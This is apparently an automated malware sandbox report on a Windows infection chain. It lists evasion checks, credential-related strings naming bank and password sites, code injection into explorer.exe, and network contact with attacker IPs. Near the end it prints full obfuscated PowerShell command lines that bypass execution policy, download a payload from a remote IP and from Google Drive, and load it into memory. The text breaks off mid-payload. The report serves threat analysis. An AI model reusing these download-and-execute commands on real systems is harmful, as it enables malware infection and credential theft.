Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02973ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	19_2_02973ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02971D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	19_2_02971D4A
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD30A8 FindFirstFileW,FindNextFileW,FindClose,	20_2_00FD30A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0320255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	21_2_0320255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	22_2_02C214D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	22_2_02C213FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	22_2_02C215BE
Source: C:\Windows\explorer.exe	Code function: 23_2_00A01DB0 FindFirstFileW,FindNextFileW,FindClose,	23_2_00A01DB0
Source: C:\Windows\explorer.exe	Code function: 23_2_00A01EB4 FindFirstFileW,FindNextFileW,FindClose,	23_2_00A01EB4

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_02976512 GetSystemInfo,

19_2_02976512

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wihaduv	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 5E92.tmp.19.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 5E92.tmp.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: 5E92.tmp.19.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 5E92.tmp.19.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
Source: powershell.exe, 00000001.00000002.1451121837.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1455036868.00000000082E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 5E92.tmp.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 5E92.tmp.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
Source: powershell.exe, 00000001.00000002.1455036868.00000000082E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C[%=
Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTbrVMWare
Source: 5E92.tmp.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 5E92.tmp.19.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&00000
Source: 5E92.tmp.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 5E92.tmp.19.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 5E92.tmp.19.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000003.2160994269.0000000002FBF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5E92.tmp.19.dr	Binary or memory string: AMC password management pageVMware20,11696501413
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 5E92.tmp.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 5E92.tmp.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 5E92.tmp.19.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 5E92.tmp.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: 5E92.tmp.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: powershell.exe, 0000000A.00000002.1747767274.000000000715C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5E92.tmp.19.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: )d2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: wscript.exe, 00000007.00000002.1416665051.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5E92.tmp.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 5E92.tmp.19.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 5E92.tmp.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 5E92.tmp.19.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 5E92.tmp.19.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: 5E92.tmp.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: powershell.exe, 00000001.00000002.1451121837.00000000074FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd-
Source: 5E92.tmp.19.dr	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

System information queried: ModuleInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

System information queried: CodeIntegrityInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 13_2_00402920 LdrLoadDll,

13_2_00402920

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_02C216C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

22_2_02C216C7

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_029D9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

19_2_029D9247

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_02971011 GetProcessHeap,RtlFreeHeap,

19_2_02971011

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\wihaduv

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wihaduv.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 45.91.8.152 80

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_7848.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6124.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Creates a thread in another existing process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Thread created: C:\Windows\explorer.exe EIP: 2491960

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 2288 base: 4179C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 2312 base: 7FF60A072D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 2796 base: 4179C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 2936 base: 4179C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 4232 base: 7FF60A072D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 3108 base: 4179C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 4072 base: 7FF60A072D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 6160 base: 4179C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 4576 base: 7FF60A072D10 value: 90

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: A82008	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0

Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		30_2_00151016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		30_2_001510A5

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2Y